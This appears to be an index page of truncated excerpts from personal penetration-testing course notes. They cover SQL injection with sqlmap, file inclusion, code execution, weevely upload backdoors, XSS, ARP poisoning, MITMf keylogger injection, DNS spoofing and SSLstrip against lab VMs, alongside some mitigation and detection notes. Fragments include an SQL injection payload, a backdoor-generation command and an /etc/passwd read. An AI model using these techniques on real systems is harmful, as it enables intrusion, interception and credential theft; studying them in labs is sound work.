OWASP ZAP(ZED ATTACK PROXY) Automatically find vulnerabilities in web applications. Free and easy to use. It can also be used for manual testing. This is the welcome page. Options Page Scan Policy Setting Page. Attack this target URL http://10.0.0.24…

SQL INJECTION WHAT IS SQL? Most websites use a database to store data. Most data stored in it(usernames, passwords ..etc.) Web application reads, updates and inserts data in the database. Interaction with DB done using SQL. WHY ARE THEY SO DANGEROUS…

SQL INJECTION SQLMAP Tool designed to exploit SQL injections. Works with many DB types, MySQL, MSSQL ...etc. >sqlmap --help >sqlmap -u [target URL] Following are examples: sqlmap -u "http://10.0.0.24/mutillidae/index.php?page=user-info.php&…

REMOTE FILE INCLUSION Similar to local file inclusion. But allows an attacker to read ANY file from ANY server. Execute PHP files from other servers on the current server. Store PHP files on other servers as .txt. Pre-Condition: Set allow_url_include…

How to hack a website? An application installed on a computer. ->web application pen-testing A computer uses an OS + Other applications -> server-side attacks. Managed by humans -> client-side attacks Target: metastable VM…

WHAT IS A WEBSITE Computer with OS and some servers. Apache, MySQL ...etc. Cotains web application. PHP, Python ...etc. Web application is executed here and not on the client's machine. How to hack a website? An application installed on a computer. -…

 CRAWING DIRECTORIES Directories/folders inside the web root. Can contain files or other directories. Ex: target.com/directory plus.google.com/discover Target: Metasploitable2-Linux #!/usr/bin/env python import requests def request(url): try: return…

XSS VULNS XSS - CROSS SITE SCRIPTING VULNS Allow an attacker to inject javascript code into the page. The code is executed when the page loads. The code is executed on the client machine, not the server. Three main types: 1. Persistent/Stored XSS 2.…

SQL INJECTION Preventing SQLi Filters can be bypassed. Use a blacklist of commands? Still can be bypassed. Use whitelist? Same issue. -> Use parameterized statements, separate data from SQL code. <?php //$textbox1 = admin' union select # Select * fr…

SQL INJECTION Discovering SQLi in GET Inject by browser URL. Selecting Data From Database Change the number to a big one, then you can get a useful error message. And you can try different number to find the right column. Using “union select 1,2,3,4,…

VULNS MITIGATION 1. File Upload Vulns - Only allow safe files to be updated. 2. Code Execution Vulns: Don't use dangerous functions. Filter use input before execution. 3. File inclusion: Disable allow_url_fopen & allow_url_include. Use static file in…

LOCAL FILE INCLUSION Allows an attacker to read ANY file on the same server. Access files outside www directory. Try to read  /etc/passwd file. 1. We know the current file path from the following error. 2. Try to visit following URL: http://10.0.0.24…

CODE EXECUTION VULNS Allows an attacker to execute OS commands. Windows or Linux commands. Can be used to get a reverse shell. Or upload any file using wget command. Code execution commands attached in the resources. The following examples assums the…

EXPLOITATION -File Upload VULNS Simple type of vulnerabilities. Allow users to upload executable files such as PHP. Upload a PHP shell or backdoor, ex:weevly 1. Generate backdoor weevly generage [password] [file name] 2. Upload the generated file. 3.…

INFORMATION GATHERING IP address. Domain name Info. Technologies used. Other websites on the same server. DNS records. Unlisted files, sub-domains, directories. 1. Whois Lookup - Find info about the owner of the target. () -> http://whois.domaintools…

Guessing Login Information on Login Pages Our target website: http://10.0.0.45/dvwa/login.php #!/usr/bin/env python import requests target_url = "http://10.0.0.45/dvwa/login.php" data_dict = {"username": "dfdfddfd", "pas…

CRAWING SPIDER Goal -> Recursively list all links starting from a base URL. 1. Read page HTML. 2. Extract all links. 3. Repeat for each new link that is not already on the list. #!/usr/bin/env python import re import requests from urllib.parse import…

CRAWLING SUMMARY Our crawler so far can guess: Subdomains. Directories. Files. Advantages: ->Discover "hidden" paths/paths admin does not want us to know. Disadvantages: -> Will does not discover everything. Solution: -> Analyse discove…

ARP Poisoning - arpspoof Arpspoof is a tool part of a suit called dsniff, which contains a number of network penetration tools. Arpspoof can be used to launch a MITM attack and redirect traffic to flow through our device. 1. Tell the target client th…

Detecting suspicious activities using Wireshark You can use make the MAC address of the router to static on the ARP table to prevent ARP attack. But it is not effective and useful for big companys . Start the attacks from the Kali Linux. Analyze the…

Detecting ARP Posionning Attacks ARP main security issues: 1. Each ARP requests/response is trusted. 2. Clients can accept responses even if they did not send a request. We can use the tool called Xarp(http://www.xarp.net/) to detect this kind attack…

MITM - Wireshark WIreshark is a network protocol analyser that is designed to help network administartors to keep track of what is happening in their network and analyse all the packtes. Wireshark works by logging each packet that flows through the d…

MITM - Code Injection Inject javascript or HTML code into pages. Code gets executed on target machine. Use - - inject plugin. Code can be: 1. Stored on a local file --js-file or --html-file 2. Stored online --js-url or --html-url 3. Or you can supply…

MITM - Capturing Screen Of Target & Injecting a Keylogger ScreenShotter Plugin: ScreenShotter: Uses HTML5 Canvas to render an accurate screenshot of a clients browser --screen Load plugin 'ScreenShotter' --interval SECONDS Interval at which screensho…

MITM-DNS Spoofing DNS Spoofing allows us to redirect any request to a certain domain to another domain, for example we can redirect any request from live.com to a fake page !! 1. Edit DNS settings leafpad /etc/mitmf/mitms.conf 2. Run ettercap to arp…

Session Hijacking What if the user uses the "remember me" feature? If the user uses this feature the authentication happens using the cookies and not the user and password, So instead of sniffing the password we can sniff the cookies and inject…

MITM - bypassing HTTPS Most websites use https in their login pages, this means that these pages are validated using an SSL certificate and there for will show a warning to the user that the certificate is invalid. SSLstrip is a tool that canbe used…

ARP Poisoning - MITMf MITMf is a framework that allows us to launch a number of MITM attacks. MITMf also starts SSLstrip automatically to bypass HTTPS/SSL. Download and Install the MITMf tool from the following website: https://github.com/byt3bl33d3r…

MITM - ARP Poisoning Theory Man In The Middle Attacks - ARP Poisoning This is one of the most dangerous and effective attacks that can be used, it is used to redirect packets to and from any client to our device, and since we have the network key, we…

Nmap Nmap is a network discovery tool that can be used to gather detailed information about any client or network. We shall have a look at some of its uses to discover connected clients and gather information about them. We are going to use Zenmap -…